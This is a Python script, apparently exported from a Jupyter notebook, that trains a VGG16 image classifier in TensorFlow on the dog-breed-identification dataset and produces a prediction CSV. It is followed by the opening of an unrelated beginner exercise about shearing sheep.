'../datasets/dog_breed_identification_training.tfrecords'\nevaluating_file = '../datasets/dog_breed_identification_evaluating.tfrecords'\n\nmodel_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt'\n\n\n# In[ ]:\n\n\ndef get_file(file_dir, labels_file):\n filenames = next(os.walk(file_dir))[2]\n num_files = len(filenames)\n labels_onehot = pd.get_dummies(labels_file['breed'])\n images = []\n labels = []\n for index, file in enumerate(filenames):\n images.append(os.path.join(file_dir, file))\n labels.append(list(labels_onehot.loc[file.split('.')[0]]))\n\n return images, labels\n\ndef get_batch(image_list, label_list, img_width, img_height, batch_size, capacity):\n\n image = tf.cast(image_list, tf.string)\n label = 
\n\n# ###\n\n# ## Moving average model\n\n# In[1]:\n\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom tensorflow.contrib.layers import xavier_initializer_conv2d\nimport datetime\nimport pandas as pd\n\n\n# In[2]:\n\n\ninput_size = 224\nkeep_prob = 0.5\nnum_classes = 120\nlr_decay = 0.95\nnum_gens_to_wait = 250.\nnum_epochs = 200000\nbatch_size = 16\nlearning_rate = 0.0001\nregularztion_rate = 5 / (2 * 9200)\nmoving_average_decay = 0.99\n\n\n# In[ ]:\n\n\ntraining_filepath = \"../datasets/dog-breed-identification/train/\"\nlabels_file = pd.read_csv('../datasets/dog-breed-identification/labels.csv', index_col = 'id')\nfilewriter_path = \"../Models/dog_breed_identification\"\ncheckpoint_path = \"../Models/dog_breed_identification\"\nweight_file = '../Models/dogs_vs_cats_vgg16/vgg16_weights.npz'\n\ntraining_file = '../datasets/dog_breed_identification_training.tfrecords'\nevaluating_file = '../datasets/dog_breed_identification_evaluating.tfrecords'\n\nmodel_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt'\n\n\n# In[ ]:\n\n\ndef get_file(file_dir, labels_file):\n filenames = next(os.walk(file_dir))[2]\n num_files = len(filenames)\n labels_onehot = pd.get_dummies(labels_file['breed'])\n images = []\n labels = []\n for index, file in enumerate(filenames):\n images.append(os.path.join(file_dir, file))\n labels.append(list(labels_onehot.loc[file.split('.')[0]]))\n\n return images, labels\n\ndef get_batch(image_list, label_list, img_width, img_height, batch_size, capacity):\n\n image = tf.cast(image_list, tf.string)\n label = tf.cast(label_list, tf.int32)\n\n input_queue = tf.train.slice_input_producer([image, label])\n\n label = input_queue[1]\n image_contents = tf.read_file(input_queue[0])\n image = tf.image.decode_jpeg(image_contents, channels=3)\n\n image = tf.image.resize_image_with_crop_or_pad(image,img_width,img_height)\n image = tf.image.per_image_standardization(image) # standardize the image\n image_batch, label_batch = tf.train.shuffle_batch([image, label], batch_size = batch_size, num_threads = 64, capacity = capacity, min_after_dequeue = batch_size)\n # label_batch = tf.reshape(label_batch, [batch_size])\n # print(label_batch)\n\n return image_batch, label_batch\n\n\n# In[ ]:\n\n\ndef batch_norm(inputs, is_training, is_conv_out = True, decay = 0.999):\n scale = tf.Variable(tf.ones([inputs.get_shape()[-1]]))\n beta = tf.Variable(tf.zeros([inputs.get_shape()[-1]]))\n pop_mean = tf.Variable(tf.zeros([inputs.get_shape()[-1]]), trainable = False)\n pop_var = tf.Variable(tf.ones([inputs.get_shape()[-1]]), trainable = False)\n\n if is_training:\n if is_conv_out:\n batch_mean, batch_var = tf.nn.moments(inputs, [0, 1, 2])\n else:\n batch_mean, batch_var = tf.nn.moments(inputs, [0])\n train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n train_var = tf.assign(pop_var, pop_var * decay + batch_var * (1 - decay))\n\n with tf.control_dependencies([train_mean, train_var]):\n return tf.nn.batch_normalization(inputs, batch_mean, batch_var, beta, scale, 0.001)\n else:\n return tf.nn.batch_normalization(inputs, pop_mean, pop_var, beta, scale, 0.001)\n\n\n# In[ ]:\n\n\nwith tf.name_scope('input_images') as scope:\n X = tf.placeholder(tf.float32, [None, input_size, input_size, 3], name = 'images')\n\nwith tf.name_scope('input_labels') as scope:\n Y = tf.placeholder(tf.float32, [None, num_classes], name = 'labels')\n\n\n# In[ ]:\n\n\ndef print_activations(t):\n print(t.op.name, ' ', t.get_shape().as_list())\n\ndef variable_summaries(name, var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope(name):\n # compute the mean of the parameter and record it with tf.summary.scalar\n mean = tf.reduce_mean(var)\n tf.summary.scalar(name + '/mean', mean)\n\n # compute the standard deviation of the parameter\n with tf.name_scope(name + '/stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n # record the standard deviation, maximum and minimum with tf.summary.scalar\n tf.summary.scalar(name + '/stddev', stddev)\n tf.summary.scalar(name + '/max', tf.reduce_max(var))\n tf.summary.scalar(name + '/min', tf.reduce_min(var))\n # record the distribution of the parameter with a histogram\n tf.summary.histogram(name + '/histogram', var)\n\ndef VGG16(images, keep_prob, num_classes, regularizer):\n var_list = []\n\n # with tf.name_scope('preprocess') as scope:\n # mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3], name='img_mean')\n # images = images - mean\n\n with tf.name_scope('conv1_1') as scope:\n W1 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 3, 64], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W1))\n b1 = tf.get_variable(name = scope + '/biases', shape = [64], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn1 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = images, filter = W1, strides = [1, 1, 1, 1], padding = 'SAME'), b1), True)\n # conv1 = tf.nn.bias_add(tf.nn.conv2d(input = images, filter = W1, strides = [1, 1, 1, 1], padding = 'SAME'), b1)\n conv1 = tf.nn.relu(bn1, name = scope)\n var_list += [W1, b1]\n\n variable_summaries(scope + '/weights', W1)\n 
variable_summaries(scope + '/biases', b1)\n variable_summaries(scope + '/conv', conv1)\n print_activations(conv1)\n\n with tf.name_scope('conv1_2') as scope:\n W2 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 64, 64], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W2))\n b2 = tf.get_variable(name = scope + '/biases', shape = [64], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn2 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv1, filter = W2, strides = [1, 1, 1, 1], padding = 'SAME'), b2), True)\n # conv2 = tf.nn.bias_add(tf.nn.conv2d(input = conv1, filter = W2, strides = [1, 1, 1, 1], padding = 'SAME'), b2)\n conv2 = tf.nn.relu(bn2, name = scope)\n var_list += [W2, b2]\n\n variable_summaries(scope + '/weights', W2)\n variable_summaries(scope + '/biases', b2)\n variable_summaries(scope + '/conv', conv2)\n print_activations(conv2)\n\n with tf.name_scope('pool1') as scope:\n max_pool1 = tf.nn.max_pool(value = conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool1)\n\n with tf.name_scope('conv2_1') as scope:\n W3 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 64, 128], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W3))\n b3 = tf.get_variable(name = scope + '/biases', shape = [128], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn3 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool1, filter = W3, strides = [1, 1, 1, 1], padding = 'SAME'), b3), True)\n # conv3 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool1, filter = W3, strides = [1, 1, 1, 1], padding = 'SAME'), b3)\n conv3 = tf.nn.relu(bn3, name = scope)\n var_list += [W3, b3]\n\n variable_summaries(scope + '/weights', W3)\n variable_summaries(scope + '/biases', b3)\n variable_summaries(scope + '/conv', conv3)\n print_activations(conv3)\n\n with tf.name_scope('conv2_2') as scope:\n W4 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 128, 128], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W4))\n b4 = tf.get_variable(name = scope + '/biases', shape = [128], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn4 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv3, filter = W4, strides = [1, 1, 1, 1], padding = 'SAME'), b4), True)\n # conv4 = tf.nn.bias_add(tf.nn.conv2d(input = conv3, filter = W4, strides = [1, 1, 1, 1], padding = 'SAME'), b4)\n conv4 = tf.nn.relu(bn4, name = scope)\n var_list += [W4, b4]\n\n variable_summaries(scope + '/weights', W4)\n variable_summaries(scope + '/biases', b4)\n variable_summaries(scope + '/conv', conv4)\n print_activations(conv4)\n\n with tf.name_scope('pool2') as scope:\n max_pool2 = tf.nn.max_pool(value = conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool2)\n\n with tf.name_scope('conv3_1') as scope:\n W5 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 128, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W5))\n b5 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n\n bn5 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool2, filter = W5, strides = [1, 1, 1, 1], padding = 
'SAME'), b5), True)\n # conv5 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool2, filter = W5, strides = [1, 1, 1, 1], padding = 'SAME'), b5)\n conv5 = tf.nn.relu(bn5, name = scope)\n var_list += [W5, b5]\n\n variable_summaries(scope + '/weights', W5)\n variable_summaries(scope + '/biases', b5)\n variable_summaries(scope + '/conv', conv5)\n print_activations(conv5)\n\n with tf.name_scope('conv3_2') as scope:\n W6 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W6))\n b6 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn6 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv5, filter = W6, strides = [1, 1, 1, 1], padding = 'SAME'), b6), True)\n # conv6 = tf.nn.bias_add(tf.nn.conv2d(input = conv5, filter = W6, strides = [1, 1, 1, 1], padding = 'SAME'), b6)\n conv6 = tf.nn.relu(bn6, name = scope)\n var_list += [W6, b6]\n\n variable_summaries(scope + '/weights', W6)\n variable_summaries(scope + '/biases', b6)\n variable_summaries(scope + '/conv', conv6)\n print_activations(conv6)\n\n with tf.name_scope('conv3_3') as scope:\n W7 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W7))\n b7 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn7 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv6, filter = W7, strides = [1, 1, 1, 1], padding = 'SAME'), b7), True)\n # conv7 = tf.nn.bias_add(tf.nn.conv2d(input = conv6, filter = W7, strides = [1, 1, 1, 1], padding = 'SAME'), b7)\n conv7 = tf.nn.relu(bn7, name = scope)\n var_list += [W7, b7]\n\n variable_summaries(scope + '/weights', W7)\n variable_summaries(scope + '/biases', b7)\n variable_summaries(scope + '/conv', conv7)\n print_activations(conv7)\n\n with tf.name_scope('pool3') as scope:\n max_pool3 = tf.nn.max_pool(value = conv7, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool3)\n\n with tf.name_scope('conv4_1') as scope:\n W8 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W8))\n b8 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn8 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool3, filter = W8, strides = [1, 1, 1, 1], padding = 'SAME'), b8), True)\n # conv8 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool3, filter = W8, strides = [1, 1, 1, 1], padding = 'SAME'), b8)\n conv8 = tf.nn.relu(bn8, name = scope)\n var_list += [W8, b8]\n\n variable_summaries(scope + '/weights', W8)\n variable_summaries(scope + '/biases', b8)\n variable_summaries(scope + '/conv', conv8)\n print_activations(conv8)\n\n with tf.name_scope('conv4_2') as scope:\n W9 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W9))\n b9 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn9 = 
batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv8, filter = W9, strides = [1, 1, 1, 1], padding = 'SAME'), b9), True)\n # conv9 = tf.nn.bias_add(tf.nn.conv2d(input = conv8, filter = W9, strides = [1, 1, 1, 1], padding = 'SAME'), b9)\n conv9 = tf.nn.relu(bn9, name = scope)\n var_list += [W9, b9]\n\n variable_summaries(scope + '/weights', W9)\n variable_summaries(scope + '/biases', b9)\n variable_summaries(scope + '/conv', conv9)\n print_activations(conv9)\n\n with tf.name_scope('conv4_3') as scope:\n W10 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W10))\n b10 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn10 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv9, filter = W10, strides = [1, 1, 1, 1], padding = 'SAME'), b10), True)\n # conv10 = tf.nn.bias_add(tf.nn.conv2d(input = conv9, filter = W10, strides = [1, 1, 1, 1], padding = 'SAME'), b10)\n conv10 = tf.nn.relu(bn10, name = scope)\n var_list += [W10, b10]\n\n variable_summaries(scope + '/weights', W10)\n variable_summaries(scope + '/biases', b10)\n variable_summaries(scope + '/conv', conv10)\n print_activations(conv10)\n\n with tf.name_scope('pool4') as scope:\n max_pool4 = tf.nn.max_pool(value = conv10, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool4)\n\n with tf.name_scope('conv5_1') as scope:\n W11 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W11))\n b11 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn11 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool4, filter = W11, strides = [1, 1, 1, 1], padding = 'SAME'), b11), True)\n # conv11 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool4, filter = W11, strides = [1, 1, 1, 1], padding = 'SAME'), b11)\n conv11 = tf.nn.relu(bn11, name = scope)\n var_list += [W11, b11]\n\n variable_summaries(scope + '/weights', W11)\n variable_summaries(scope + '/biases', b11)\n variable_summaries(scope + '/conv', conv11)\n print_activations(conv11)\n\n with tf.name_scope('conv5_2') as scope:\n W12 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W12))\n b12 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn12 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv11, filter = W12, strides = [1, 1, 1, 1], padding = 'SAME'), b12), True)\n # conv12 = tf.nn.bias_add(tf.nn.conv2d(input = conv11, filter = W12, strides = [1, 1, 1, 1], padding = 'SAME'), b12)\n conv12 = tf.nn.relu(bn12, name = scope)\n var_list += [W12, b12]\n\n variable_summaries(scope + '/weights', W12)\n variable_summaries(scope + '/biases', b12)\n variable_summaries(scope + '/conv', conv12)\n print_activations(conv12)\n\n with tf.name_scope('conv5_3') as scope:\n W13 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W13))\n b13 = 
tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn13 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv12, filter = W13, strides = [1, 1, 1, 1], padding = 'SAME'), b13), True)\n # conv13 = tf.nn.bias_add(tf.nn.conv2d(input = conv12, filter = W13, strides = [1, 1, 1, 1], padding = 'SAME'), b13)\n conv13 = tf.nn.relu(bn13, name = scope)\n var_list += [W13, b13]\n\n variable_summaries(scope + '/weights', W13)\n variable_summaries(scope + '/biases', b13)\n variable_summaries(scope + '/conv', conv13)\n print_activations(conv13)\n\n with tf.name_scope('pool5') as scope:\n max_pool5 = tf.nn.max_pool(value = conv13, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool5)\n\n flattened = tf.reshape(max_pool5, [-1, 7*7*512])\n print_activations(flattened)\n\n with tf.name_scope('fc1') as scope:\n W14 = tf.get_variable(name = scope + '/weights', shape = [7*7*512, 4096], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W14))\n b14 = tf.get_variable(name = scope + '/biases', shape = [4096], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn14 = batch_norm(tf.nn.bias_add(tf.matmul(flattened, W14), b14), True, False)\n # fc1 = tf.nn.bias_add(tf.matmul(flattened, W14), b14)\n fc1 = tf.nn.relu(bn14)\n var_list += [W14, b14]\n\n variable_summaries(scope + '/weights', W14)\n variable_summaries(scope + '/biases', b14)\n variable_summaries(scope + '/fc', fc1)\n print_activations(fc1)\n\n with tf.name_scope('dropout1') as scope:\n dropout1 = tf.nn.dropout(fc1, keep_prob = keep_prob, name = scope)\n print_activations(dropout1)\n\n with tf.name_scope('fc2') as scope:\n W15 = tf.get_variable(name = scope + '/weights', shape = [4096, 4096], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W15))\n b15 = tf.get_variable(name = scope + '/biases', shape = [4096], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn15 = batch_norm(tf.nn.bias_add(tf.matmul(dropout1, W15), b15), True, False)\n # fc2 = tf.nn.bias_add(tf.matmul(fc1, W15), b15)\n fc2 = tf.nn.relu(bn15)\n var_list += [W15, b15]\n\n variable_summaries(scope + '/weights', W15)\n variable_summaries(scope + '/biases', b15)\n variable_summaries(scope + '/fc', fc2)\n print_activations(fc2)\n\n with tf.name_scope('dropout2') as scope:\n dropout2 = tf.nn.dropout(fc2, keep_prob = keep_prob, name = scope)\n print_activations(dropout2)\n\n with tf.name_scope('fc3') as scope:\n W16 = tf.get_variable(name = scope + '/weights', shape = [4096, num_classes], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W16))\n b16 = tf.get_variable(name = scope + '/biases', shape = [num_classes], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn16 = batch_norm(tf.nn.bias_add(tf.matmul(dropout2, W16), b16), True, False)\n # fc3 = tf.nn.bias_add(tf.matmul(fc2, W16), b16)\n fc3 = tf.nn.relu(bn16)\n var_list += [W16, b16]\n\n variable_summaries(scope + '/weights', W16)\n variable_summaries(scope + '/biases', b16)\n variable_summaries(scope + '/fc', fc3)\n print_activations(fc3)\n\n out = tf.nn.softmax(fc3)\n return fc3, out, var_list\n\n\n# In[ ]:\n\n\nregularizer = tf.contrib.layers.l2_regularizer(regularztion_rate)\nregularizer = None\n\n\n# In[ ]:\n\n\nfc3, out, var_list 
= VGG16(X, keep_prob, num_classes, regularizer)\ntf.add_to_collection('pred', out)\n\n\n# In[ ]:\n\n\nwith tf.name_scope('loss') as scope:\n    cross_entropy = tf.reduce_mean(\n        tf.nn.softmax_cross_entropy_with_logits(logits = fc3, labels = Y))\n    # loss = cross_entropy + tf.add_n(tf.get_collection('losses'))\n    loss = cross_entropy\n    tf.summary.scalar('loss', loss)\n\n\n\n# In[ ]:\n\n\nwith tf.name_scope(\"accuracy\") as scope:\n    correct_pred = tf.equal(tf.argmax(out, 1), tf.argmax(Y, 1))\n    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n    tf.summary.scalar('accuracy', accuracy)\n\n\n\n# In[ ]:\n\n\nwith tf.name_scope('train') as scope:\n\n    global_step = tf.Variable(tf.constant(0), trainable=False)\n    # Moving-average model, to speed up training in the early stages\n    # variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)\n    # Apply the moving-average model to all trainable parameters\n    # variable_averages_op = variable_averages.apply(tf.trainable_variables())\n    # Exponentially decayed learning rate: large at the start, stabilizing later on\n    model_learning_rate = tf.train.exponential_decay(\n        learning_rate, global_step, num_gens_to_wait, lr_decay, staircase = False)\n    # optimizer = tf.train.AdamOptimizer(learning_rate = model_learning_rate)\n    # train_step = optimizer.minimize(loss, global_step = global_step)\n\n    # optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n    gradients = tf.gradients(loss, var_list)\n    gradients = list(zip(gradients, var_list))\n    optimizer = tf.train.AdamOptimizer(learning_rate = model_learning_rate)\n\n    # Pass global_step so it is incremented on every update; without it the\n    # exponential decay above never advances and the learning rate stays constant.\n    train_op = optimizer.apply_gradients(grads_and_vars = gradients, global_step = global_step)\n\n    # Compute the back-propagation update and the moving average of every parameter in one step\n    # with tf.control_dependencies([train_step, variable_averages_op]):\n    #     train_op = tf.no_op(name = scope)\n\n\n# In[ ]:\n\nmerged_summary = tf.summary.merge_all()\nwriter = tf.summary.FileWriter(filewriter_path)\nsaver = tf.train.Saver()\n\n\n# In[ ]:\n\n\ntraining_filename_queue = tf.train.string_input_producer(\n    [training_file], shuffle=True)\nevaluating_filename_queue = tf.train.string_input_producer(\n    [evaluating_file], shuffle=True)\n\ntraining_reader = tf.TFRecordReader()\nevaluating_reader = tf.TFRecordReader()\n\n_, training_serialized_example = training_reader.read(training_filename_queue)\n_, evaluating_serialized_example = evaluating_reader.read(evaluating_filename_queue)\n\ntraining_features = tf.parse_single_example(training_serialized_example, features={\n    \"label_raw\": tf.FixedLenFeature([], tf.string),\n    \"image_raw\": tf.FixedLenFeature([], tf.string)\n})\nevaluating_features = tf.parse_single_example(evaluating_serialized_example, features={\n    \"label_raw\": tf.FixedLenFeature([], tf.string),\n    \"image_raw\": tf.FixedLenFeature([], tf.string)\n})\n\ntraining_image = tf.decode_raw(training_features['image_raw'], tf.uint8)\ntraining_image = tf.reshape(training_image, [input_size, input_size, 3])\ntf.summary.image('training_input', training_image, 10)\ntraining_image = tf.image.per_image_standardization(training_image)\ntf.summary.image('standardization_training_input', training_image, 10)\ntraining_label = tf.decode_raw(training_features['label_raw'], tf.uint8)\ntraining_label = tf.reshape(training_label, [120])\ntraining_label = tf.cast(training_label, tf.int32)\n\nevaluating_image = tf.decode_raw(evaluating_features['image_raw'], tf.uint8)\nevaluating_image = tf.reshape(evaluating_image, [input_size, input_size, 3])\ntf.summary.image('evaluating_input', evaluating_image, 10)\nevaluating_image = tf.image.per_image_standardization(evaluating_image)\ntf.summary.image('standardization_evaluating_input', evaluating_image, 10)\n
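# Note: tf.summary.image expects a 4-D [batch, height, width, channels] tensor; these\n# single images are 3-D, so they may need tf.expand_dims(image, 0) before being logged.\n# The first summary records the raw uint8 frame, the second the standardized\n# (zero-mean, unit-variance) version produced by per_image_standardization.\n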
evaluating_label = tf.decode_raw(evaluating_features['label_raw'], tf.uint8)\nevaluating_label = tf.reshape(evaluating_label, [120])\nevaluating_label = tf.cast(evaluating_label, tf.int32)\n\ntraining_images, training_labels = tf.train.shuffle_batch(\n    [training_image, training_label], batch_size = batch_size, num_threads = 2,\n    capacity = 1000 + 3 * batch_size, min_after_dequeue = batch_size)\nevaluating_images, evaluating_labels = tf.train.shuffle_batch(\n    [evaluating_image, evaluating_label], batch_size = batch_size, num_threads = 2,\n    capacity = 1000 + 3 * batch_size, min_after_dequeue = batch_size * 2)\n\n\n# In[ ]:\n\n\nwith tf.Session() as sess:\n    init = tf.global_variables_initializer()\n    sess.run(init)\n\n    # weights = np.load(weight_file)\n    # keys = sorted(weights.keys())\n    # for i, k in enumerate(keys):\n    #     if i == 26:\n    #         break\n    #     print(i, k, np.shape(weights[k]))\n    #     sess.run(var_list[i].assign(weights[k]))\n\n    writer.add_graph(sess.graph)\n    coord = tf.train.Coordinator()\n    threads = tf.train.start_queue_runners(sess = sess, coord = coord)\n    for i in range(num_epochs):\n        training_batchX, training_batchY = sess.run([training_images, training_labels])\n\n        _, loss_value, accu, lr_rate = sess.run(\n            [train_op, cross_entropy, accuracy, model_learning_rate], feed_dict={X: training_batchX, Y: training_batchY})\n\n        if i%10 == 0:\n            s = sess.run(merged_summary, feed_dict={X: training_batchX, Y: training_batchY})\n            writer.add_summary(s, i)\n\n        # _, loss_value, accu = sess.run(\n        #     [train_op, loss, accuracy], feed_dict={X: training_batchX, Y: training_batchY})\n\n        print('%s [Epoch: %d] The training loss is %g.'%(datetime.datetime.now(), i, loss_value))\n\n        if i%100 == 0:\n            evaluating_batchX, evaluating_batchY = sess.run([evaluating_images, evaluating_labels])\n            evaluating_accu, evaluating_loss = sess.run([accuracy, loss], feed_dict={X: evaluating_batchX, Y: evaluating_batchY})\n\n            print('The evaluating loss is %g, accuracy is %g'%(evaluating_loss, evaluating_accu))\n            print(\n                \"After %d training step(s), loss on training batch is %g, accuracy is %g, learning_rate is %g.\"\n                % (i,loss_value,accu, lr_rate))\n        if i%10000 == 0:\n            saver.save(sess, model_path + '.%d'%i)\n\n    saver.save(sess, model_path)\n    coord.request_stop()\n    coord.join(threads)\n\nwriter.close()\n\n\n# In[1]:\n\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\n\n# In[2]:\n\n\nIMG_HEIGHT,IMG_WIDTH,IMG_CHANNELS = 224, 224, 3\n\nmeta_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt.160000.meta'\nmodel_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt.160000'\n\n\n# In[3]:\n\n\ntest_path = '../datasets/dog-breed-identification/test'\nsubmission_df = pd.read_csv('../datasets/dog-breed-identification/sample_submission.csv',\n                            index_col = 'id')\nsubmission_df.head()\n\n\n# In[10]:\n\n\nsubmission_data = []\n\nwith tf.Session() as sess:\n    saver = tf.train.import_meta_graph(meta_path)\n    saver.restore(sess, model_path)\n    graph = tf.get_default_graph()\n\n    X = graph.get_tensor_by_name('input_images/images:0')\n    # 'pred' was stored as the softmax output already; applying softmax again is\n    # monotonic, so the argmax below is unaffected.\n    pred = tf.nn.softmax(tf.get_collection('pred')[0])\n\n    # No initializer here: saver.restore() assigns every variable, and running\n    # tf.global_variables_initializer() afterwards would overwrite the trained weights.\n\n    for file in submission_df.index:\n        filename = file + '.jpg'\n        image = Image.open(os.path.join(test_path, filename))\n        image = np.array(image.resize((IMG_HEIGHT,IMG_WIDTH)))\n#         image = tf.reshape(image, [IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS])\n        image = tf.image.per_image_standardization(image)\n
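        # per_image_standardization returns a graph tensor, so it has to be evaluated\n        # with sess.run before it can be copied into the NumPy batch below. Building\n        # this op inside the loop grows the graph on every iteration; a single\n        # placeholder-based op built once outside the loop would be cheaper.\n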
        images = np.zeros((1, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.float32)\n        images[0] = sess.run(image)\n\n        label_pred = sess.run(pred, feed_dict = {X: images})\n\n        submission_list = list(np.zeros([120], dtype=np.uint8))\n        print(label_pred)\n\n#         submission_list = label_pred.tolist()\n\n        # label_pred holds class probabilities; one-hot encode the most likely class.\n        submission_list[int(np.argmax(label_pred))] = 1\n        print(submission_list)\n        submission_list.insert(0, file)\n        submission_data.append(submission_list)\n\n\n# In[ ]:\n\n\nsubmission_file = pd.DataFrame(submission_data)\nsubmission_file.index = submission_file[0]\nsubmission_file = submission_file.drop(0, 1)\nsubmission_file.head()\nsubmission_file.columns = submission_df.columns\nsubmission_file.index.name = 'id'\nsubmission_file.head()\n\n\n# In[ ]:\n\n\nsubmission_file.to_csv('../datasets/dog-breed-identification/submission.csv')\n","sub_path":"TensorFlow & PyTorch - 05.py","file_name":"TensorFlow & PyTorch - 05.py","file_ext":"py","file_size_in_byte":31497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564183022","text":"size = [5,7,300,90,24,50,75]\ni = 0\na = 1\nprint(\"Hi, I'm Linh the farmer. Here is the size of my sheep:\\n\",size,\"\\n\")\nwant = int(input(\"How many months do you want to raise the sheep for?: \"))\n\nfor month in range(want):\n    biggest = max(size)\n    \n    print(\"\\tThe biggest sheep this month is\",biggest,\"\\n\\tLet's shear it!!\\n\\t\\b\"+\"-- \"*10)\n    \n    size.remove(max(size))\n    size.append(8)\n    print(\"\\tAfter shearing, here is my flock:\\n\\t\",size)\n    for number in size:\n        number +=50\n        size[i] = number\n        i+=1\n    i = 0 \n    